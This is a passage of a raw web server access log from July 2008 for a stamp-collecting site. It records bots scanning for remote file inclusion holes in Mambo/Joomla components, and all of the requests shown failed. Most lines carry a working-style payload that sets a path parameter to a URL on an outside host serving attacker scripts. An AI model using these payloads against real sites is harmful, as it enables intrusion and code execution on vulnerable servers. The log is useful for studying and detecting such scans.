212.34.153.42 - - [13/Jul/2008:23:10:58 -0700] "GET /logs/errors.php?error=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.mathstamps.com"
212.220.139.98 - - [13/Jul/2008:23:13:42 -0700] "GET /index.php?pageurl=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.128.80.11 - - [13/Jul/2008:23:14:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
64.128.80.11 - - [13/Jul/2008:23:14:28 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:15:45 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:15:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:15:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.23.236.98 - - [13/Jul/2008:23:15:48 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:15:51 -0700] "GET /logs/access_080630.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:15:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:15:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:16:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:16:31 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:23:17:29 -0700] "GET /logs/access_080623.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:23:17:30 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:23:17:30 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:17:44 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:23:19:47 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.